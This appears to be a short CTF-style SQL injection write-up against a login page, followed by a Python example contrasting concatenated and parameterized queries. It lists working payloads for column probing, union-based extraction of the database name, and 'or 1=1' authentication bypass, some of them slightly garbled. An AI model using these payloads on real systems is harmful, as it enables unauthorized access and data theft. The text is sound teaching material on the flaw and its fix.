1. Conventional method
payload: ?username=admin&password=1
payload: ?username=admin&password=6-5 // check whether the page is the same
payload: ?username=admin&password=1' order by 3%23
payload: ?username=admin&password=1' order by 4%23
Construct the injection statement
payload: ?username=admin&password=1' union select 1,2,database()%23
2. Universal password
admin' or '1'='1
payload:
?username=admin' or '1'='1&password=123456789' or '1'='1
or
?username=admin' or '1'='1&password=admin' or '1'='1' %23
http://xxx.cn:81/check.php?username=admin' or '1'='1&password=admin' or '1'='1' %23
?username=username=admin' or '1'='1&password=admin' or '1'='1
http://xxx:81/check.php?username=username=admin' or '1'='1&password=admin' or '1'='1
?username=username=admin' or '1'='1&password=admin' or '1'='1' %23
http://xxx.cn:81/check.php?username=use&password=admin' or '1'='1' %23
?username=use&password=admin' or '1'='1' %23
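Why the universal password works, and the fix, as an added example that is not code from the original page: the same login check written with string concatenation and with bound parameters. The users table, the query shape and the sample rows are assumptions, and SQLite stands in for whatever database sits behind check.php.

```python
import sqlite3

# Constructed sample data. Table layout and query shape are assumptions;
# plaintext passwords are used only to keep the sample short.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "S3cret!"), (2, "guest", "guest")])
    return db

def build_concat_query(username, password):
    # Vulnerable pattern: request parameters are pasted into the SQL text,
    # so a quote in the input ends the string literal and the rest is parsed as SQL.
    return ("SELECT id, username, password FROM users "
            f"WHERE username='{username}' AND password='{password}'")

def login_concat(db, username, password):
    return db.execute(build_concat_query(username, password)).fetchall()

def login_param(db, username, password):
    # Hardened pattern: placeholders bind the input as data, never as SQL.
    return db.execute(
        "SELECT id, username, password FROM users "
        "WHERE username=? AND password=?", (username, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # First universal-password payload from the page, URL-decoded.
    u, p = "admin' or '1'='1", "123456789' or '1'='1"
    print(build_concat_query(u, p))
    print("concatenated :", login_concat(db, u, p))   # every row matches
    print("parameterized:", login_param(db, u, p))    # no row matches
    print("valid login  :", login_param(db, "admin", "S3cret!"))
```

In the concatenated query the trailing or '1'='1' makes the WHERE clause true for every row, which is why the password value is irrelevant; with bound parameters the same input is compared as a literal string and matches nothing.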